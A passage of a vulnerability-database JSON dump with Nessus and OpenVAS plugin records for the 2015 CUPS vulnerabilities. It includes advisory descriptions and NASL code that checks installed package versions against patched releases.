reference:\"1.7.5-11+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cups-ppdc\", reference:\"1.7.5-11+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cups-server-common\", reference:\"1.7.5-11+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libcups2\", reference:\"1.7.5-11+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libcups2-dev\", reference:\"1.7.5-11+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libcupscgi1\", reference:\"1.7.5-11+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libcupscgi1-dev\", reference:\"1.7.5-11+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libcupsimage2\", reference:\"1.7.5-11+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libcupsimage2-dev\", reference:\"1.7.5-11+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libcupsmime1\", reference:\"1.7.5-11+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libcupsmime1-dev\", reference:\"1.7.5-11+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libcupsppdc1\", reference:\"1.7.5-11+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libcupsppdc1-dev\", reference:\"1.7.5-11+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:09:15", "references": ["https://packages.debian.org/source/squeeze-lts/cups", "https://lists.debian.org/debian-lts-announce/2015/06/msg00003.html"], "pluginID": "84061", "description": "Two critical vulnerabilities have been found in the CUPS printing system :\n\nCVE-2015-1158 - Improper Update of Reference Count Cupsd uses reference-counted strings with global scope. When parsing a print job request, cupsd over-decrements the reference count for a string from the request. As a result, an attacker can prematurely free an arbitrary string of global scope. They can use this to dismantle ACL&rsquo;s protecting privileged operations, and upload a replacement configuration file, and subsequently run arbitrary code on a target machine.\n\nThis bug is exploitable in default configurations, and does not require any special permissions other than the basic ability to print.\n\nCVE-2015-1159 - Cross-Site Scripting A cross-site scripting bug in the CUPS templating engine allows the above bug to be exploited when a user browses the web. This XSS is reachable in the default configuration for Linux instances of CUPS, and allows an attacker to bypass default configuration settings that bind the CUPS scheduler to the &lsquo;localhost&rsquo; or loopback interface.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "reporter": "Tenable", "published": "2015-06-10T00:00:00", "title": "Debian DLA-239-1 : cups security update", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2018-07-06T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:libcupsdriver1", "p-cpe:/a:debian:debian_linux:cups-client", "p-cpe:/a:debian:debian_linux:cups", "p-cpe:/a:debian:debian_linux:libcupsimage2", "p-cpe:/a:debian:debian_linux:libcupsmime1", "p-cpe:/a:debian:debian_linux:libcupscgi1-dev", "p-cpe:/a:debian:debian_linux:libcups2", "p-cpe:/a:debian:debian_linux:libcupsppdc1", "p-cpe:/a:debian:debian_linux:cups-common", "p-cpe:/a:debian:debian_linux:libcups2-dev", "p-cpe:/a:debian:debian_linux:cups-ppdc", "p-cpe:/a:debian:debian_linux:cups-dbg", "p-cpe:/a:debian:debian_linux:libcupscgi1", "p-cpe:/a:debian:debian_linux:cupsddk", "p-cpe:/a:debian:debian_linux:libcupsdriver1-dev", "p-cpe:/a:debian:debian_linux:libcupsimage2-dev", "p-cpe:/a:debian:debian_linux:libcupsppdc1-dev", "p-cpe:/a:debian:debian_linux:cups-bsd", "p-cpe:/a:debian:debian_linux:libcupsmime1-dev"], "id": "DEBIAN_DLA-239.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84061", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-239-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84061);\n script_version(\"2.7\");\n script_cvs_date(\"Date: 2018/07/06 11:26:06\");\n\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(75098, 75106);\n\n script_name(english:\"Debian DLA-239-1 : cups security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two critical vulnerabilities have been found in the CUPS printing\nsystem :\n\nCVE-2015-1158 - Improper Update of Reference Count Cupsd uses\nreference-counted strings with global scope. When parsing a print job\nrequest, cupsd over-decrements the reference count for a string from\nthe request. As a result, an attacker can prematurely free an\narbitrary string of global scope. They can use this to dismantle\nACL&rsquo;s protecting privileged operations, and upload a replacement\nconfiguration file, and subsequently run arbitrary code on a target\nmachine.\n\nThis bug is exploitable in default configurations, and does not\nrequire any special permissions other than the basic ability to print.\n\nCVE-2015-1159 - Cross-Site Scripting A cross-site scripting bug in the\nCUPS templating engine allows the above bug to be exploited when a\nuser browses the web. This XSS is reachable in the default\nconfiguration for Linux instances of CUPS, and allows an attacker to\nbypass default configuration settings that bind the CUPS scheduler to\nthe &lsquo;localhost&rsquo; or loopback interface.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/06/msg00003.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/cups\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cups-bsd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cups-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cups-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cups-ppdc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cupsddk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcups2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcups2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupscgi1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupscgi1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsdriver1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsdriver1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsimage2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsimage2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsmime1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsmime1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsppdc1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsppdc1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"cups\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"cups-bsd\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"cups-client\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"cups-common\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"cups-dbg\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"cups-ppdc\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"cupsddk\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcups2\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcups2-dev\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupscgi1\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupscgi1-dev\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsdriver1\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsdriver1-dev\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsimage2\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsimage2-dev\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsmime1\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsmime1-dev\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsppdc1\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsppdc1-dev\", reference:\"1.4.4-7+squeeze8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-09-28T18:25:22", "references": ["http://linux.oracle.com/errata/ELSA-2015-1123.html"], "pluginID": "1361412562310123098", "description": "Oracle Linux Local Security Checks ELSA-2015-1123", "edition": 5, "reporter": "Eero Volotinen", "published": "2015-10-06T00:00:00", "title": "Oracle Linux Local Check: ELSA-2015-1123", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123098", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123098", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1123.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123098\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:59:21 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1123\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1123 - cups security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1123\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1123.html\");\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-filesystem\", rpm:\"cups-filesystem~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-ipptool\", rpm:\"cups-ipptool~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.4.2~67.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.4.2~67.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.4.2~67.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.4.2~67.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-php\", rpm:\"cups-php~1.4.2~67.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-23T15:12:37", "references": ["https://www.redhat.com/archives/rhsa-announce/2015-June/msg00021.html", "2015:1123-01"], "pluginID": "1361412562310871377", "description": "The remote host is missing an update for the ", "edition": 7, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-06-18T00:00:00", "title": "RedHat Update for cups RHSA-2015:1123-01", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871377", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871377", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for cups RHSA-2015:1123-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871377\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-18 06:12:04 +0200 (Thu, 18 Jun 2015)\");\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for cups RHSA-2015:1123-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'cups'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"CUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing\nof string objects. An attacker can submit a malicious print job that\nexploits this flaw to dismantle ACLs protecting privileged operations,\nallowing a replacement configuration file to be uploaded which in turn\nallows the attacker to run arbitrary code in the CUPS server\n(CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An\nattacker could use this flaw to bypass the default configuration settings\nthat bind the CUPS scheduler to the 'localhost' or loopback interface.\n(CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in\nthe way cups handled compressed raster image files. An attacker could\ncreate a specially-crafted image file, which when passed via the cups\nRaster filter, could cause the cups filter to crash. (CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and\nCVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the cupsd daemon will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"cups on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:1123-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-June/msg00021.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups-filesystem\", rpm:\"cups-filesystem~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-debuginfo\", rpm:\"cups-debuginfo~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.4.2~67.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-debuginfo\", rpm:\"cups-debuginfo~1.4.2~67.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.4.2~67.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.4.2~67.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.4.2~67.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:49:10", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160577.html", "2015-9801"], "pluginID": "1361412562310869456", "description": "Check the version of cups", "edition": 5, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-06-21T00:00:00", "title": "Fedora Update for cups FEDORA-2015-9801", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:1361412562310869456", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869456", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for cups FEDORA-2015-9801\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869456\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-21 05:54:54 +0200 (Sun, 21 Jun 2015)\");\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\", \"CVE-2014-9679\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for cups FEDORA-2015-9801\");\n script_tag(name: \"summary\", value: \"Check the version of cups\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"CUPS printing system provides a portable printing layer for\nUNIX operating systems. It has been developed by Apple Inc.\nto promote a standard printing solution for all UNIX vendors and users.\nCUPS provides the System V and Berkeley command-line interfaces.\n\");\n script_tag(name: \"affected\", value: \"cups on Fedora 21\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-9801\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160577.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.7.5~17.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-02T14:31:35", "references": ["https://alas.aws.amazon.com/ALAS-2015-559.html"], "pluginID": "1361412562310120032", "description": "Amazon Linux Local Security Checks", "edition": 5, "reporter": "Eero Volotinen", "published": "2015-09-08T00:00:00", "title": "Amazon Linux Local Check: ALAS-2015-559", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2018-10-01T00:00:00", "id": "OPENVAS:1361412562310120032", "href": 